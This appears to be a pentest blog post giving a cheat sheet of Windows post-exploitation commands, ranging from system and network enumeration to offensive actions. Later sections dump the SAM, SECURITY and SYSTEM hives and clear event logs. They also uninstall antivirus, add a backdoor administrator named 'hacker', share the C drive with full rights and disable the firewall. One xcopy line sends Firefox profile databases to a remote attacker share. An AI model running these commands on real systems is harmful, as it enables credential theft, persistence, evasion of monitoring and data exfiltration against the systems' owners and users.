I added some useful windows commands for penetration testing.

1. Blind Files

(Things to pull when all you can do is to blindly read) LFI/Directory traversal(s).
Files that will have the same name across networks / Windows domains / systems.
FileExpected Contents / Description
%SYSTEMDRIVE%\boot.iniA file that can be counted on to be on virtually every windows host. Helps with confirmation that a read is happening.
%WINDIR%\win.iniThis is another file to look for if boot.ini isn’t there or coming back, which is some times the case.
%SYSTEMROOT%\repair\SAMIt stores users' passwords in a hashed format (in LM hash and NTLM hash).
%SYSTEMROOT%\repair\system
>insert new rows above this line<SEE IMPORTANT FILES SECTION FOR MORE IDEAS

2. System

CommandExpected Output or Description
whoamiLists your current user. Not present in all versions of Windows; however shall be present in Windows NT 6.0-6.1.
whoami /allLists current user, sid, groups current user is a member of and their sids as well as current privilege level.
setShows all current environmental variables. Specific ones to look for are USERDOMAIN, USERNAME, USERPROFILE, HOMEPATH, LOGONSERVER, COMPUTERNAME, APPDATA, and ALLUSERPROFILE.
systeminfo (XP+)Outputs a large amount of data about the sytem, including hostname, domain, logon server, time zone, network interface config, and hotfixes installed
qwinsta
(2000/NT4 with Terminal Services; XP and above)
Displaying information about RDP sessions. /CONNECT can be added, but usually not. needed to gain the information you need.
qprocess *Much like tasklist, but a bit easier to read. It has username, login mqappsrvethod, session id, pid, and binary name.

lists Terminal Services servers
atShows currently scheduled tasks via ‘at’. Even though schtasks is the new way of doing things admin wise, pentesters can still use ‘at’ to get system level shells even through Win7x64 systems.
schtasks (XP+)Lists all the currently scheduled tasks that your current user has access to see. This is the big deviation from ‘at’. Each user can have their own scheduled tasks now.
schtasks /query /fo csv /v > %TEMP%Outputs the list of services in verbose csv format. Good for throwing in temp and pulling down for a more closer look.
net start
OR
sc query
Lists services
-> sc getkeyname “XXXXX”You can use the name you got from ‘net start’ to get the ‘key name’ of the service you want more information on.
--> sc queryex “XXXXX”Using the keyname you achieved from ‘getkeyname’, you can query the status, pid and other information about the service.
net config workstationThis will display information such as NetBIOS name, the full computer name, Username (of the user executing this command), Domain, Workgroups, and more.
net time
net file
net session
net useUsed to map network shares, such as the C:\ drive.
tasklist (XP+)Is equivalent to using Taskmanager, though visible as console output instead with PID’s too.
tasklist /m  or tasklist /m blah.dllLists all of the ‘modules’ (binary (exe, dll, com or any other PE based code that was executed) for each psportsportrocess, or if a module is specified then tasklist will only list the processes with that specific module running. Great for finding processes running crypto or other specific function dlls
tasklist /svcLists processes and their accompanying service
keyname if they are parented by a service
taskkill [/f] /pid <pid>
taskkill [/f] /im <image_name>
Kill processes by name or pid (with force option)
fsutil fsinfo drivesMust be an administrator to run this, but it list the current drives on the system.
reg query HKLM /s /d /f "C:\* *.exe" | find /I "C:\" | find /V """"Locates insecurely registered executablea within the system registry on Windows 7.

3. Networking
CommandExpected Output or Description
ipconfig /allDisplays the full information about your NIC’s.
ipconfig /displaydnsDisplays your local DNS cache.
netstat -nabo
netstat -s -p [tcp|udp|icpm|ip]
netstat -r
netstat -na | findstr :445
netstat -nao | findstr LISTENINGXP and up for -o flag to get PID
netstat -nao | findstr LISTENINGXP and up for -o flag to get PID
netstat -na | findstr LISTENING
netsh diag show all
net viewQueries NBNS/SMB (SAMBA) and tries to find all hosts in your current workgroup.
net view /domain
net view /domain:otherdomain
net user %USERNAME% /domainPulls information on the current user, if they are a domain user. If you are a local user then you just drop the /domain. Important things to note are login times, last time changed password, logon scripts, and group membership
net user /domainLists all of the domain users
net accountsPrints the password policy for the local system. This can be different and superseded by the domain policy.
net accounts /domainPrints the password policy for the domain
net localgroup administratorsPrints the members of the Administrators local group
net localgroup administrators /domainas this was supposed to use localgroup & domain, this actually another way of getting *current* domain admins
net group “Domain Admins” /domainPrints the members of the Domain Admins group
net group “Enterprise Admins” /domainPrints the members of the Enterprise Admins group
net group “Domain Controllers” /domainPrints the list of Domain Controllers for the current domain
nbtstat -a [ip here]
net shareDisplays your currently shared SMB entries, and what path(s) they point to.
net session | find / “\\”
arp -aLists all the systems currently in the machine’s ARP table.
route printPrints the machine’s routing table. This can be good for finding other networks and static routes that have been put in place
browstat (Not working on XP)



http://www.securityaegis.com/ntsd-backdoor/

4. Configs

CommandExpected Output or Description
gpresult /zExtremely verbose output of GPO (Group policy) settings as applied to the current system and user
sc qc
sc query
sc queryex
type %WINDIR%\System32\drivers\etc\hostsPrint the contents of the Windows hosts file
dir %PROGRAMFILES%Prints a diretory listing of the Program Files directory.
echo %COMSPEC%Usually going to be cmd.exe in the Windows directory, but it’s good to know for sure.

5. Finding Important Files

CommandDescription / Reason
tree C:\ /f /a > C:\output_of_tree.txtPrints a directory listing in ‘tree’ format. The /a makes the tree printed with ASCII characters instead of special ones and the /f displays file names as well as folders
dir /a
dir /b /s [Directory or Filename]
dir \ /s /b | find /I “searchstring”Searches the output of dir from the root of the drive current drive (\) and all sub drectories (/s) using the ‘base’ format (/b) so that it outputs the full path for each listing, for ‘searchstring’ anywhere in the file name or path.
command | find /c /v “”Counts the lines of whatever you use for ‘command’

6. Files To Pull (if possible)

File locationDescription / Reason
%SYSTEMDRIVE%\pagefile.sysLarge file, but contains spill over from RAM, usually lots of good information can be pulled, but should be a last resort due to size
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software
%WINDIR%\repair\security
%WINDIR%\iis6.log (5, 6 or 7)
%WINDIR%\system32\logfiles\httperr\httperr1.log
%WINDIR%\system32\logfiles\w3svc1\exYYMMDD.log (year month day)
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
%WINDIR%\System32\drivers\etc\hosts

7. Remote System Access

CommandDescription / Reason
net share \\computername
tasklist /V /S computername
qwinsta /SERVER:computername
qprocess /SERVER:computername *
net use \\computernameThis maps IPC$ which does not show up as a drive but allows you to access the remote system as the current user. This is less helpful as most commands will automatically make this connection if needed
net use \\computername /user:DOMAIN\username passwordUsing the IPC$ mount use a user name and password allows you to access commands that do not usually ask for a username and password as a different user in the context of the remote system.
This is useful when you’ve gotten credentials from somewhere and wish to use them but do not have an active token on a machine you have a session on.

net time \\computername (Shows the time of target computer)
dir \\computername\share_or_admin_share\   (dir list a remote directory)
tasklist /V /S computername 

Lists tasks w/users running those tasks on a remote system. This will remove any IPC$ connection after it is done so if you are using another user, you need to re-initiate the IPC$ mount

8. Auto-Start Directories

  • ver (Returns kernel version - like uname on *nix)

Windows NT 6.1, 6.0%SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\
Windows NT 5.2, 5.1, 5,0%SystemDrive%\Documents And Settings\All Users\Start Menu\Programs\StartUp\
Windows 9x%SystemDrive%\WINDOWS\Start Menu\Programs\StartUp\
Windows NT 4.0, 3.51, 3.50%SystemDrive%\WINNT\Profiles\All Users\Start Menu\Programs\StartUp\

9. WMI

wmic bios
wmic qfe
wmic qfe get hotfixid  (This gets patches IDs)
wmic startup
wmic service
wmic os
wmic process get caption,executablepath,commandline
wmic process call create “process_name” (executes a program)
wmic process where name=”process_name” call terminate (terminates program)
wmic logicaldisk where drivetype=3 get name, freespace, systemname, filesystem, size, volumeserialnumber (hard drive information)
wmic useraccount (usernames, sid, and various security related goodies)
wmic useraccount get /ALL
wmic share get /ALL (you can use ? for gets help ! )
wmic startup list full (this can be a huge list!!!)
wmic /node:"hostname" bios get serialnumber (this can be great for finding warranty info about target)

10. Reg Command

reg save HKLM\Security security.hive  (Save security hive to a file)
reg save HKLM\System system.hive (Save system hive to a file)
reg save HKLM\SAM sam.hive (Save sam to a file)=
reg add [\\TargetIPaddr\] [RegDomain][ \Key ]
reg export [RegDomain]\[Key] [FileName]
reg import [FileName ]
reg query [\\TargetIPaddr\] [RegDomain]\[ Key ] /v [Valuename!] (you can to add /s for recurse all values )

11. Deleting Logs

wevtutil el  (list logs)
wevtutil cl <LogName> (Clear specific log)
del %WINDIR%\*.log /a /s /q /f

12. Uninstalling Software “AntiVirus” (Non interactive)

wmic product get name /value (this gets software names)
wmic product where name="XXX" call uninstall /nointeractive (this uninstalls software)

13. Invasive or Altering Commands

These commands change things on the target and can lead to getting detected
CommandDescription
net user hacker hacker /addCreats a new local (to the victim) user called ‘hacker’ with the password of ‘hacker’
net localgroup administrators /add hacker
or
net localgroup administrators hacker /add
Adds the new user ‘hacker’ to the local administrators group
net share nothing$=C:\ /grant:hacker,FULL /unlimitedShares the C drive (you can specify any drive) out as a Windows share and grants the user ‘hacker’ full rights to access, or modify anything on that drive.

One thing to note is that in newer (will have to look up exactly when, I believe since XP SP2) windows versions, share permissions and file permissions are separated. Since we added our selves as a local admin this isn’t a problem but it is something to keep in mind
net user username /active:yes /domainChanges an inactive / disabled account to active. This can useful for re-enabling old domain admins to use, but still puts up a red flag if those accounts are being watched.
netsh firewall set opmode disableDisables the local windows firewall
netsh firewall set opmode enableEnables the local windows firewall. If rules are not in place for your connection, this could cause you to loose it.

14. Other  (to be sorted)

pkgmgr usefull  /iu :”Package”
pkgmgr usefull  /iu :”TelnetServer” (Install Telnet Service ...)
pkgmgr /iu:”TelnetClient” (Client )
rundll32.exe user32.dll, LockWorkStation (locks the screen -invasive-)
wscript.exe <script js/vbs>
cscript.exe <script js/vbs/c#>
xcopy /C /S %appdata%\Mozilla\Firefox\Profiles\*.sqlite \\your_box\firefox_funstuff

OS SPECIFIC

# Win2k3

winpop stat domainname

# Vista/7

winstat features
wbadmin get status
wbadmin get items
gpresult /H gpols.htm
bcdedit /export <filename>

# Vista SP1/7/2008/2008R2 (x86 & x64)

# Enable/Disable Windows features with Deployment Image Servicing and Management (DISM):
*Note* Works well after bypassuac + getsystem (requires system privileges)
*Note2* For Dism.exe to work on x64 systems, the long commands are necessary
To list features which can be enabled/disabled: 

%windir%\System32\cmd.exe /c "%SystemRoot%\system32\Dism.exe" /online /get-features

To enable a feature (TFTP client for example): 

%windir%\System32\cmd.exe /c "%SystemRoot%\system32\Dism.exe" /online /enable-feature /featurename:TFTP

To disable a feature (again TFTP client): 

%windir%\System32\cmd.exe /c "%SystemRoot%\system32\Dism.exe" /online /disable-feature /featurename:TFTP
Makalelerin kötüye kullanım kullanıcının sorumluluğundadır. | networkpentest.net. Blogger tarafından desteklenmektedir.